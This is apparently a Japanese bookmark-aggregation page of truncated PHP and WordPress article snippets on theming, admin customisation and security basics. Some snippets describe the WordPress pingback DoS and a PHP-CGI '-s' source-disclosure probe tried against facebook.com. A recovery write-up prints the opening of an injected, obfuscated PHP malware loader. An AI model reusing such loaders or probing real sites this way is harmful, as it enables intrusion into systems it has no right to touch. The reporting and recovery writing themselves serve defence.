Amazon.co.jp: PHPによる機械学習入門: 斉藤常治, 高橋佑幸: 本
Krebsが自分のサイト(KrebsOnSecurity)に対して41,000超のWebサイトからDoSを受けていると報告しています。 このDoSはWoredpressのpingbackを悪用したものらしく、先日、Sucuriもpingback機能を悪用したDoSについて報告していました。 More Than 162,000 WordPress Sites Used for Distributed Denial of Service Attack WordPressの16万サイトが大規模攻撃の踏み台に、「Pingback」機能悪用 - ITmedia エンタープライズ pingbackを悪用したDoS方法 pingbackはハイパーリンクを設置したことを通知する仕組みですが、リモート投稿(XMLRPC)の機能(WordPressのxmlrpc.php)に対して次のPOSTを送信するとそのW
知り合いの会員制サイトの作成を手伝っています。 会員さんのお店専用のページをつくって、会員さんがお店のページを各々自由に更新できるサイトを立ち上げたいとのこと。 WordPressを導入して個別に更新できるようにしました。条件は 投稿画面をわかりやすく。フォームを埋めていくとページが出来上がるようにする 文章だけでなく、画像もアップロードできる ほかの会員がアップした記事や画像を見たり、修正できない です。備忘録としてまとめました。 基本は「寄稿者」で、足りない機能を追加していく 会員さんに与えるアカウントは「寄稿者」にします。自分の記事を作ることはできますが、他のアカウントの記事を修正することはできません。今回の用途に近いパーミッション(権限範囲)を持っています。 しかし、このままだと今回の条件には合わない部分があるので、カスタマイズをしていきます。 シンプルなダッシュボード 寄稿者でも
【重要】このサイトについて Concrete CMS の公式サイトには、長らく英語のドキュメントしか存在しない時代がありました。また、本サイトおよび日本のユーザーグループが発足した当時は、そもそも日本語で使用することも難しい状態でした。そのため、日本のユーザーの有志が集まって、日本語に対応したフォーク版をメンテナンスしたり、情報交換をしたり、日本語のドキュメントを掲載するために本サイトがオープンしました。 現在では、Concrete CMS は日本語を含む世界中のマルチバイト言語でも問題なく使用することができ、公式サイトのドキュメントにも翻訳機能が搭載されました。また、公式のフォーラムでも日本語で投稿することができます。そのため、当サイトの存在意義はほとんどなくなったため、積極的には更新せず過去のアーカイブとして残している状態です。 最新の情報を得たい方は、ぜひ公式サイトをご利用ください。
「WordPress(ワードプレス)を使ってオリジナルブログを作成してみたいけれど、難しそう・・。」そう思っている人は多いことと思います。 WordPressは、HTMLやCSSの他に、PHPというプログラミング言語を使っているため、少し敷居が高く感じてしまうことがあります。 しかし、PHPがわからなくても、ある程度のHTMLとCSSの知識があれば、初心者でも簡単に既存のテーマをカスタマイズできたり、オリジナルテーマを作成したりできるのが、WordPressが人気の理由のひとつなのです。 今回は、PHPが全くわからないWordPress初心者でも、オリジナルテーマを作成できるようになるための手順を、参考記事やオススメの書籍と共にまとめています。 この記事を読めば、WordPressでオリジナルテーマを作成するための全体的な流れをつかみ、すぐにでもテーマ作成やカスタマイズができるようになるは
このサイトはまだHTML5にしてないので、WordPressのテーマファイルをXHTMLからHTML5にするステップごとに解説されたチュートリアルを紹介します。 Convert Your WordPress Theme to HTML5 下記は各ポイントを意訳したものです。 チュートリアルのゴール HTML5のベーシックなレイアウト Step 1: header.phpをHTML5化 Step 2: index.phpをHTML5化 Step 3: sidebar.phpをHTML5化 Step 4: footer.phpをHTML5化 Step 5: single.phpをHTML5化 Step 6: style.cssをHTML5化 チュートリアルのゴール このチュートリアルは、XHTMLでつくられたWordPressのテーマファイルをHTML5にするものです。テーマファイルはそれぞれ
HTML5とかJavaScriptがもてはやされてるけどやっぱPHPだよねっ。一人でWEBサービス作れちゃう人とかカッコイイィィィィ。デザインはTwitter Bootstrapでィィし、やっぱサーバーサイド出来る人が輝いてるぅウィリリリリリ。 みたいな会話が各地で聞こえてくる昨今ですが、PHPはまだまだ現役で活躍していく言語だと思います。Facebookも今のところPHPで作られていますし、何よりもみんな大好きWordPressをカスタマイズするための基礎知識としてPHPを知っておくに越したことはありません。 PHPの本もとても多いですね。SmartyがいいとかPEARを使えとか新旧色々な情報が混在しています。ざっくり知りたい人向けから、フレームワーク解説の良書やしっかりしたセキュリティの本までピックアップしてみます。 とにかくとりあえずどんなもんか知りたい 自分はプログラマになる気はな
社内で、SQLインジェクションについてあらためて原理・原則から議論したいねという風潮がにわかに起こったので、ひとまずは叩き台として僕の方でまとめて皆で議論しましょうというわけで、以下のような資料を作成した。 社内勉強会用の資料なのだけど、僕は別にセキュリティに詳しいわけでもないし、ましてやPHPのことは素人なので、外部の識者にレビューしていただいて、できるだけ正しい知識に基づいて議論できればと思い、まずスライドを先行公開することにした。そうしたところ、Twitter上で多数の識者よりいろいろとご指摘いただいて、少くとも決定的におかしな内容にはなっていないものになったようだ。ありがとうございます。 僕らの職務のひとつに「セキュリティ関連」というものも謳われているので、そのあたりの知識普及・基盤整備についても、仕事のひとつとして行っている。先にも書いた通り、僕自身がその点についてよく理解できて
前回、”free wordpress themes”って検索してテーマを探すと超ヤバイよ という記事を書きました。 お陰様でとても拡散したんですが、危険なテーマを見わけるための検証方法を伏せたのが裏目でちょっとあれだったので、それについて解説します。 Theme Authenticity Checker (TAC) によるチェック WordPress › Theme Authenticity Checker (TAC) « WordPress Plugins 結論から言いますが、このプラグインによるチェックでは不完全でした。 実際に “free wordpress themes” で Google 検索して出てくる1つ目(苦笑)の ”http://www.themesbase.com/” というサイトのテーマで検証してみましょう。 今回は、このサイトの一つ目で紹介されている Pioneer
2. 自己紹介 WordPress Plugins/JSeries プロジェクト の一員で、主に WordPress のプラグイン をつくっています。 Head Cleaner - <head> 部分のお掃除をするプ ラグイン OAuth Provider - WordPress を OAuth プロ バイダにするプラグイン http://profiles.wordpress.org/wokamoto 2012年8月23日木曜日 3. WordPress のパフォーマンス チューニング済 AMI "網元" を 公開したりしました。 http://ja.megumi-cloud.com/ 2012年8月23日木曜日
ようこそ 時代遅れの情報がウェブ上にあふれている。そんな情報を見たPHP初心者は戸惑ってしまうだろう。そして、まずい手法やまずいコードが広まってしまう。 そんなのはもうやめよう。PHP: The Right Way は気軽に読めるクイックリファレンスだ。PHPの一般的なコーディング規約、 ウェブ上のよくできたチュートリアルへのリンク、そして現時点でのベストプラクティスだと執筆者が考えていることをまとめた。 大事なのは、 PHPを使うための正式なお作法など存在しない ってこと。 このサイトの狙いは、はじめて PHP を使うことになった開発者に、いろんなトピックを紹介すること。 経験豊富なプロの人にとっても、これまで深く考えることなく使ってきた内容について、新鮮な見方を伝えられるだろう。 このサイトは、決して「どのツールを使えばいいのか」を教えるものじゃない。 いくつかの選択肢を示して、それぞ
レイヤー機能による画像合成機能やサムネイル生成等が超簡単に行えるPHPライブラリ「PHPImageWorkshop」 2012年07月10日- PHPImageWorkshop - PHP class using the GD library for image processing レイヤー機能による画像合成機能やサムネイル生成等が超簡単に行えるPHPライブラリ「PHPImageWorkshop」。 画像生成のサービス等を作る際には押さえておきたいライブラリかも。WEBサービスにおいては画像生成はよく使われるものですから、覚えておいて損はないでしょう。 以下に行える処理の概要をご説明します。 画像合成 複数の画像を組み合わせて簡単に合成する機能。透過pngの画像を合成します。 合成結果。透過PNGによって綺麗に合成されていますね。 実装コードが分かりやすくて、次のように addLayer
この投稿は 12年 前に公開されました。いまではもう無効になった内容を含んでいるかもしれないことをご了承ください。 ぜったい需要あるし知りたいから書いてくれたしと言われたので書きます。最近、リクエストに答えてブログ書くのが楽だなーと感じる自堕落。 さて、WordPressをCMS的に使っていると、「カテゴリーアーカイブの情報を充実させたい」という需要がよくあると思います。 ケーススタディ 筋トレの情報サイトを作っているとしましょう。カテゴリー階層は大きく分けて3系統あります。 トレーニング方法 腕立て、スクワット、デッドリフトなど、トレーニング情報のジャンルがサブカテゴリーとしてぶら下がる サプリメント 筋量を増やしたいとか、持久力を付けたいとか、体重を落としつつ筋肉をつけたいとか、そういった「サプリメント使用の目的」ごとにサブカテゴリーがわかれています。 トレーニングジム サブカテゴリー
PHPカンファレンス関西2012で使用したスライドです。完全な内容は下北沢で開催した際のスライドと動画を御覧ください。Read less
PHPに新たな脆弱性が見つかって、CGIモードで動作するPHPの場合コマンドライン引数がHTTP経由で渡せてしまうため、-sオプションを渡すとPHPのソースコードが丸見えになるというのが話題になってます。(-sオプションはhtmlでシンタックスハイライトまでしてくれてコードが見やすくなる) そこでFacebookに向けてこれを試してみると・・・ https://www.facebook.com/?-s こんな情報が!! <?php include_once 'https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS'; このURLにアクセスすると、セキュリティエンジニアの求人情報ページに行きます :) おしゃれー
前回もちらっとメモしたんですが、 もっと具体的な内容も覚えておきたいので改めて実際のコードとともに手順をメモしたいと思います。 オリジナルの管理画面を用意しておくと、クライアントさんがサイトの更新を行う場合に安心して更新をお任せできますw ゴールはこれ。 不要なダッシュボードウィジェット、左メニューなどをすべて非表示にし、 オリジナルで用意したヘッダー&メニューを差し込みます。 デフォルトの管理画面は高機能な分、メニューがずらーーーっと並んでおり WEBに詳しくない方にとっては何が何だか分からないものですからね。 ここは一思いにばっさりと切り捨て、クライアント専用にやさしいシンプルな見た目の管理画面を用意してあげることで 大幅に間違いが減りますし、説明の時間も短縮できると考えてます。 ちなみに、上記キャプチャに表示されているメモは『Headache With Pictures』というプラグ
こんにちはこんにちは!! Webプログラミングしてますか! よく「PHPはセキュリティがダメ」とか言われてるよね。 でもそれって、べつにPHPが悪いんじゃなくて、 たぶん、セキュリティとかが、まだよくわからない人が多いだけなんじゃないかな。 がんばって勉強しようと思っても、なんだか難しい理屈が並んでいたりするしね…。 なので今日は、セキュリティ対策について、 「これだけやっとけば、わりと安全になるよ」ってことを、初心者むけに、大雑把に書いてみます! 理屈がわからなくても、最初はコピペでも、 なにもやらないより、やったほうがきっとマシになる! 1. XSS対策 動的なものを表示するとき、全部エスケープすればokです! (NG) あなたの名前は <?= $name ?> ですね! ↓ (OK) あなたの名前は <?= htmlspecialchars($name, ENT_QUOTES) ?>
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
私は結構エディタ難民で、HTML/CSS/PHP等をコーディングする際のエディタをWindows・Mac含め色々試してきましたが、最近は NetBeans IDE に落ち着いています。 NetBeans IDE は厳密にはエディタではなく、Windows・Mac・Linux用の無料で利用できるIDE(統合開発環境)の一種です。 ちなみに、↓のキャラクターは NetBeans IDE 日本語コミュニティの公式マスコットの「ねこび〜ん」です。 私はWordPressのテーマファイルを作成しているときに、PHPで独自のCMSを開発されている @kawagooch さんに勧められて使い始めたのですがとてもしっくりきたので、以後 HTML/CSS/PHP などWebサイトのコーディングには NetBeans IDE をメインで使っています。 私自身、NetBeans IDE を使うようになってからサ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
